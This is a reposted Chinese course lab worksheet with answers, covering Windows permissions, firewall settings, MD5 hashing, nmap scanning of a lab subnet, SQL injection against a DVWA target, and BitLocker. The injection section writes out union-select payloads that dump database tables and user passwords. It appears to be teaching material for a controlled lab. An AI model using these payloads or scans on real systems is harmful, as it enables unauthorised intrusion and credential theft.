标签:截图 加密 192.168 SCB 安全 文件夹 实训 应用 user
课程:云安全技术应用实训
题目及要求:
1、以自己姓名在物理机D:创建一个文件夹,如:张三;创建二个本地用户user-1、user-2和本地组SCB、YFB,user-1为组SCB的成员,user-2为组YFB的成员;对所创建的文件夹如张三,设置权限,SCB权限为:读取和执行、列出文件夹内容、读取;YFB权限为:读取和执行、列出文件夹内容、读取、写入。
对配置的重要过程或结果进行截图。
(1)查看本地用户:user-1、user-2的截图
(5分)net user(或此电脑-属性-本地用户和组-用户-查看创建的用户)
(2)查看本地组:SCB、YFB及成员的截图
(5分)此电脑-属性-本地用户和组-组-查看创建的组-点击组查看成员
(3)SCB权限设置结果截图
(5分)点击创建的“张三”文件夹属性-安全-编辑-添加-高级-立即查找-找到SCB/YFB确认-然后设置权限(下面显示有打钩-确认)
(4)YFB权限设置结果截图
(5分)
2、开启Windows防火墙,并禁止Telnet和Telnet服务器远程管理。
(1)Windows防火墙状态
(5分)
控制面板-系统安全-Windows防火墙开启
(2)禁止Telnet和Telnet服务器远程管理
(5分)
(控制面板-程序-程序和功能-启用或关闭Windows功能-找到Telnet远程管理服务-取消勾选 确认。)https://jingyan.baidu.com/article/ca2d939df80460ab6d31ce3f.html
3、使用MD5加密解密工具,在线完成明文112233445566778899的加密,其中:
32位MD5、16位MD5的值分别为:
并对结果进行截图。(上网搜索MD5加密直接使用)(5分)
MD532:7ccc95c9d5f7df1e7defd1a5b024c8b3
MD516::d5f7df1e7defd1a5
4、使用扫描工具,获得某网段(192.168.220.0/24)的存活主机,并将存活主机列表写入ch1.txt文件中。(先在linux安装yum -y insatll nmap)
(1)使用命令nmap截图
(5分)nmap 192.168.220.0/24 >ch1.txt
(2)使用cat命令查看存活主机的信息截图
(5分)
5、使用nmap命令,扫描主机192.168.220.250所开放的端口、软件的版本、操作类型。
(1)服务端口及版本截图
(5分)
[root@localhost ~]# nmap -sP 192.168.220.250
(2)操作系统截图
(5分)[root@localhost ~]# nmap -O -sV 192.168.220.250
6、网络渗透(SQL注入)
连接并登录靶机:192.168.220.250,用户名:admin,密码:password。
将DVMA安全等级调至:low
完成以下操作,并对操作结果截图。
(1)User ID:
1’ order by 1 #
1’ order by 2 #
(10分)
(2)输入 1’ union select version(),database() # 并对结果进行截图。
(5分)
(3)输入 1’ union select 1, table_name from information_schema.tables where table_schema=database() # 并对结果进行截图。
(5分)
(4)输入 1’ union select 1, column_name from information_schema.columns where table_name=“users” # 并对结果进行截图。
(5分)
(5)输入 1’ union select user, password from users # 并对结果进行截图。
(5分)
7、磁盘及文件加密
(1)使用BitLocker对D:盘进行加密,密码为ABCabc123#,并将恢复密钥保存在E:盘的key文件夹中,对操作过程进行截图。(10分)
控制面板-系统和安全-BitLocker驱动器加密
使用BitLocker加密磁盘_ingy-CSDN博客
(2)对key文件夹,进行缩,加密密码为123456。(5分)(压缩时找下面添加密码压缩)
标签:截图,加密,192.168,SCB,安全,文件夹,实训,应用,user
来源: https://blog.csdn.net/qq_46109103/article/details/118274045
本站声明:
1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。